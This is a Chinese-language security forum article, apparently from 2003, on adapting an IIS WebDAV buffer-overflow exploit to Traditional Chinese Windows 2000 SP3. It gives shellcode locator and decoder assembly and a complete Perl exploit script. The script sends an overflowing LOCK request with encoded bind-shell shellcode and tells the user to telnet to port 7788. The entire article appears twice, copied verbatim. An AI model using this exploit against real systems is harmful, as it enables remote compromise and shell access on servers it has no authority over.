创建时间:2003-04-07
文章属性:原创
文章来源:Nanika@seed.net.tw minjack.tw@yahoo.com.tw
文章提交: Nanika (minjack.tw_at_yahoo.com.tw)
Webdav漏洞ISNO方法的补充~~
作者:Nanika
首先必须先感谢ISNO的指导,和袁哥的文章,我把我研究的结果,跟大家报告一下,
ISNO的方法很好,他把真正绑定Port的shellcode放在最后
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 808/r/n/r/n";
print $socket "$tag$shell/r/n";
然后利用袁哥所写的 http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
把ISNO所写的
add esi, 1000h
jmp loadmem
lookupN:
add esi, 4000h
loadmem:
mov eax, [esi]
cmp eax, 4e4e4e4eh ;搜索含NNNN的内存,提高搜索效率
jnz lookupN
add esi, 4
lookupYXYX:
mov al, byte ptr [esi]
inc esi
cmp al, 59h ;在后面搜索YXYX,这是我们放在shellcode前面用来定位的
jnz lookupYXYX
mov al, byte ptr [esi]
inc esi
cmp al, 58h
jnz lookupYXYX
lodsw
cmp ax, 0x5859
jnz lookupYXYX
jmp esi ;搜索到以后就跳到shellcode去执行
这一段编码
但我们还需要一段译码的程序
袁哥所写的
对shellcode解碼代码的汇编代码﹕
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
unlockdataw:
nop
push ebx
/* 可以通用 push esp */
pop esi
loopload:
lodsw
cmp ax,0x6099 // SHELLDATA
jnz loopload
push esi
push esi
push esi
pop edi
looplock: lodsw
cmp ax,NOPCODE
jz toshell
nop
sub al,DATABASE
nop
push eax
pop ecx
lodsw
nop
sub al,DATABASE
lea edx,dword ptr [eax+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
lea edx,dword ptr [edx+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
push edx
pop eax
/*
temp=shellcodefnadd[j];
buff[OVERADD+offset+2*j]=DATABASE+temp/0x10;
buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10;
的逆运算﹐但这儿是双字节形式
就是0xa*0x10+0xb=0xab这么个算法﹐为了迁就指令范围弄得这么复杂
*/
stosb
jz looplock
jnz looplock
nop
toshell: pop eax
push eax
push eax
push eax
ret
nop
_emit(0x99)
_emit(0x60)
_emit(0x0)
_emit(0x0)
_emit(0x0)
_emit(0x0)
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
但是~~我在测试时发现~~这一段在繁体中文版中~~没有办法通用~~
有很多字符没有办法正确的解碼
于是我花了很多时间~~写了一个~~繁体中文版的译码程序
_Nanikalock2:
00421B9C 53 push ebx
00421B9D 5E pop esi
00421B9E 90 nop
00421B9F 66 AD lods word ptr [esi]
00421BA1 EB 01 jmp _Nanikalock2+8 (00421ba4)
00421BA3 90 nop
00421BA4 90 nop
00421BA5 66 3D 58 59 cmp ax,offset _Nanikalock2+0Bh (00421ba7)
00421BA9 75 F4 jne _Nanikalock2+3 (00421b9f)
00421BAB 90 nop
00421BAC 56 push esi
00421BAD 5F pop edi
00421BAE 90 nop
00421BAF 66 AD lods word ptr [esi]
00421BB1 EB 01 jmp _Nanikalock2+18h (00421bb4)
00421BB3 90 nop
00421BB4 90 nop
00421BB5 66 3D 4F 00 cmp ax,offset _Nanikalock2+1Bh (00421bb7)
00421BB9 74 3C je _Nanikalock2+5Bh (00421bf7)
00421BBB 90 nop
00421BBC 2C 61 sub al,61h
00421BBE 50 push eax
00421BBF 59 pop ecx
00421BC0 90 nop
00421BC1 66 AD lods word ptr [esi]
00421BC3 EB 01 jmp _Nanikalock2+2Ah (00421bc6)
00421BC5 90 nop
00421BC6 2C 61 sub al,61h
00421BC8 50 push eax
00421BC9 5A pop edx
00421BCA 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BCE 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BD2 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BD6 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BDA 52 push edx
00421BDB 58 pop eax
00421BDC AA stos byte ptr [edi]
00421BDD 51 push ecx
00421BDE 90 nop
00421BDF 59 pop ecx
00421BE0 90 nop
00421BE1 90 nop
00421BE2 90 nop
00421BE3 90 nop
00421BE4 90 nop
00421BE5 74 C8 je _Nanikalock2+13h (00421baf)
00421BE7 EB C6 jmp _Nanikalock2+13h (00421baf)
00421BE9 EB 01 jmp _Nanikalock2+50h (00421bec)
00421BEB 90 nop
00421BEC 90 nop
00421BED 90 nop
00421BEE 90 nop
00421BEF 90 nop
00421BF0 90 nop
00421BF1 90 nop
00421BF2 90 nop
00421BF3 90 nop
00421BF4 90 nop
00421BF5 90 nop
00421BF6 90 nop
00421BF7 90 nop
00421BF8 90 nop
00421BF9 EB 05 jmp _Nanikalock2+64h (00421c00)
00421BFB 90 nop
00421BFC 90 nop
00421BFD 90 nop
00421BFE 58 pop eax
00421BFF 59 pop ecx
这一段的程序~~是利用袁哥所写的构想~~
经过我的测试~~繁体中文或是简体中文~也可以省略那一段搜索SHELLCODE的程序~~
我们可以直接~~利用袁哥的编码~~把绑定cmd的shellcode编码~~
然后建构在译码程序之后~~~
详细请参考最后的Exploit~~
我觉得现在大家所发出来的EXPLOIT都没有办法可以很有效的通用~~
原因在于编码方式的不同~~和SHELLCODE定位困难~等等问题~~
我只是初学者~~写这篇的目的~~希望可以抛砖引玉~~让各位高手~~可以研究出~~通用在各种版本的利用方法~~
繁体中文版的
exploit
#!/usr/bin/perl
#use call ebx as the ret
#test on Chinese Big5 Win2k sp3
#by Nanika@seed.net.tw minjack.tw@yahoo.com.tw
#thanks isno,yuange
use IO::Socket;
if ($#ARGV<1){die "webdavx.pl IP offset/r/noffset: 0-7/r/n";}
$host = @ARGV[0];
$port = 80;
$offset = @ARGV[1];
$decode =
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090".
"%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4".
"%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c".
"%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d".
"%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852".
"%u51aa".
#decoder code
#66 bytes
"%u5990%u9090%u9090%u7490%uebc8%uebc6%u0590%u9090".
"%u9090%u9090%u9090%u9090%u9090%ueb90%u9005%u9090".
"%u5958";
$sc =
"jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk".
"hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh".
"jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc".
"hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf".
"njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg".
"oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb".
"ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake".
"fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh".
"dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke".
"fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi".
"mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb".
"dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl".
"bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke".
"fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg".
"hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh".
"mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp".
"kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi".
"mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf".
"gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf".
"njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping".
"jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm".
"njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh".
"mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine".
"nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc".
"pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh".
"gigigigi";
#code to find the real shellcode
#1608 byes
$num = 266+$offset;
$bf = "A" x $num;
$ret = "%u6e53%ueb06%ueb06%u2191" x 8; #call ebx addr 0x6e532191
$n = 63549;
$buf = "O" x $n;
$tag = "YXYX";
$shell ="AAAA";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!/n";
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 8/r/n/r/n";
print $socket "$tag$shell/r/n";
print "send buffer.../r/n";
print "telnet target 7788/r/n";
print "if fail, try other offset(0-7)/r/n";
print "test on Chinese Big5 Win2k sp3/r/n";
print "by Nanika@seed.net.tw minjack.tw@yahoo.com.tw/r/n";
print "thanks isno, yuange/r/n";
close($socket);
若是失败~~可以调整offset~~或是跟改call ebx的地址
文章属性:原创
文章来源:Nanika@seed.net.tw minjack.tw@yahoo.com.tw
文章提交: Nanika (minjack.tw_at_yahoo.com.tw)
Webdav漏洞ISNO方法的补充~~
作者:Nanika
首先必须先感谢ISNO的指导,和袁哥的文章,我把我研究的结果,跟大家报告一下,
ISNO的方法很好,他把真正绑定Port的shellcode放在最后
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 808/r/n/r/n";
print $socket "$tag$shell/r/n";
然后利用袁哥所写的 http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
把ISNO所写的
add esi, 1000h
jmp loadmem
lookupN:
add esi, 4000h
loadmem:
mov eax, [esi]
cmp eax, 4e4e4e4eh ;搜索含NNNN的内存,提高搜索效率
jnz lookupN
add esi, 4
lookupYXYX:
mov al, byte ptr [esi]
inc esi
cmp al, 59h ;在后面搜索YXYX,这是我们放在shellcode前面用来定位的
jnz lookupYXYX
mov al, byte ptr [esi]
inc esi
cmp al, 58h
jnz lookupYXYX
lodsw
cmp ax, 0x5859
jnz lookupYXYX
jmp esi ;搜索到以后就跳到shellcode去执行
这一段编码
但我们还需要一段译码的程序
袁哥所写的
对shellcode解碼代码的汇编代码﹕
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
unlockdataw:
nop
push ebx
/* 可以通用 push esp */
pop esi
loopload:
lodsw
cmp ax,0x6099 // SHELLDATA
jnz loopload
push esi
push esi
push esi
pop edi
looplock: lodsw
cmp ax,NOPCODE
jz toshell
nop
sub al,DATABASE
nop
push eax
pop ecx
lodsw
nop
sub al,DATABASE
lea edx,dword ptr [eax+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
lea edx,dword ptr [edx+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
push edx
pop eax
/*
temp=shellcodefnadd[j];
buff[OVERADD+offset+2*j]=DATABASE+temp/0x10;
buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10;
的逆运算﹐但这儿是双字节形式
就是0xa*0x10+0xb=0xab这么个算法﹐为了迁就指令范围弄得这么复杂
*/
stosb
jz looplock
jnz looplock
nop
toshell: pop eax
push eax
push eax
push eax
ret
nop
_emit(0x99)
_emit(0x60)
_emit(0x0)
_emit(0x0)
_emit(0x0)
_emit(0x0)
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
但是~~我在测试时发现~~这一段在繁体中文版中~~没有办法通用~~
有很多字符没有办法正确的解碼
于是我花了很多时间~~写了一个~~繁体中文版的译码程序
_Nanikalock2:
00421B9C 53 push ebx
00421B9D 5E pop esi
00421B9E 90 nop
00421B9F 66 AD lods word ptr [esi]
00421BA1 EB 01 jmp _Nanikalock2+8 (00421ba4)
00421BA3 90 nop
00421BA4 90 nop
00421BA5 66 3D 58 59 cmp ax,offset _Nanikalock2+0Bh (00421ba7)
00421BA9 75 F4 jne _Nanikalock2+3 (00421b9f)
00421BAB 90 nop
00421BAC 56 push esi
00421BAD 5F pop edi
00421BAE 90 nop
00421BAF 66 AD lods word ptr [esi]
00421BB1 EB 01 jmp _Nanikalock2+18h (00421bb4)
00421BB3 90 nop
00421BB4 90 nop
00421BB5 66 3D 4F 00 cmp ax,offset _Nanikalock2+1Bh (00421bb7)
00421BB9 74 3C je _Nanikalock2+5Bh (00421bf7)
00421BBB 90 nop
00421BBC 2C 61 sub al,61h
00421BBE 50 push eax
00421BBF 59 pop ecx
00421BC0 90 nop
00421BC1 66 AD lods word ptr [esi]
00421BC3 EB 01 jmp _Nanikalock2+2Ah (00421bc6)
00421BC5 90 nop
00421BC6 2C 61 sub al,61h
00421BC8 50 push eax
00421BC9 5A pop edx
00421BCA 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BCE 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BD2 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BD6 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BDA 52 push edx
00421BDB 58 pop eax
00421BDC AA stos byte ptr [edi]
00421BDD 51 push ecx
00421BDE 90 nop
00421BDF 59 pop ecx
00421BE0 90 nop
00421BE1 90 nop
00421BE2 90 nop
00421BE3 90 nop
00421BE4 90 nop
00421BE5 74 C8 je _Nanikalock2+13h (00421baf)
00421BE7 EB C6 jmp _Nanikalock2+13h (00421baf)
00421BE9 EB 01 jmp _Nanikalock2+50h (00421bec)
00421BEB 90 nop
00421BEC 90 nop
00421BED 90 nop
00421BEE 90 nop
00421BEF 90 nop
00421BF0 90 nop
00421BF1 90 nop
00421BF2 90 nop
00421BF3 90 nop
00421BF4 90 nop
00421BF5 90 nop
00421BF6 90 nop
00421BF7 90 nop
00421BF8 90 nop
00421BF9 EB 05 jmp _Nanikalock2+64h (00421c00)
00421BFB 90 nop
00421BFC 90 nop
00421BFD 90 nop
00421BFE 58 pop eax
00421BFF 59 pop ecx
这一段的程序~~是利用袁哥所写的构想~~
经过我的测试~~繁体中文或是简体中文~也可以省略那一段搜索SHELLCODE的程序~~
我们可以直接~~利用袁哥的编码~~把绑定cmd的shellcode编码~~
然后建构在译码程序之后~~~
详细请参考最后的Exploit~~
我觉得现在大家所发出来的EXPLOIT都没有办法可以很有效的通用~~
原因在于编码方式的不同~~和SHELLCODE定位困难~等等问题~~
我只是初学者~~写这篇的目的~~希望可以抛砖引玉~~让各位高手~~可以研究出~~通用在各种版本的利用方法~~
繁体中文版的
exploit
#!/usr/bin/perl
#use call ebx as the ret
#test on Chinese Big5 Win2k sp3
#by Nanika@seed.net.tw minjack.tw@yahoo.com.tw
#thanks isno,yuange
use IO::Socket;
if ($#ARGV<1){die "webdavx.pl IP offset/r/noffset: 0-7/r/n";}
$host = @ARGV[0];
$port = 80;
$offset = @ARGV[1];
$decode =
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090".
"%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4".
"%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c".
"%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d".
"%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852".
"%u51aa".
#decoder code
#66 bytes
"%u5990%u9090%u9090%u7490%uebc8%uebc6%u0590%u9090".
"%u9090%u9090%u9090%u9090%u9090%ueb90%u9005%u9090".
"%u5958";
$sc =
"jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk".
"hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh".
"jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc".
"hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf".
"njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg".
"oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb".
"ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake".
"fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh".
"dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke".
"fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi".
"mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb".
"dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl".
"bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke".
"fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg".
"hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh".
"mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp".
"kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi".
"mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf".
"gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf".
"njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping".
"jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm".
"njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh".
"mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine".
"nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc".
"pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh".
"gigigigi";
#code to find the real shellcode
#1608 byes
$num = 266+$offset;
$bf = "A" x $num;
$ret = "%u6e53%ueb06%ueb06%u2191" x 8; #call ebx addr 0x6e532191
$n = 63549;
$buf = "O" x $n;
$tag = "YXYX";
$shell ="AAAA";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!/n";
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 8/r/n/r/n";
print $socket "$tag$shell/r/n";
print "send buffer.../r/n";
print "telnet target 7788/r/n";
print "if fail, try other offset(0-7)/r/n";
print "test on Chinese Big5 Win2k sp3/r/n";
print "by Nanika@seed.net.tw minjack.tw@yahoo.com.tw/r/n";
print "thanks isno, yuange/r/n";
close($socket);
若是失败~~可以调整offset~~或是跟改call ebx的地址
扫一扫
2217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
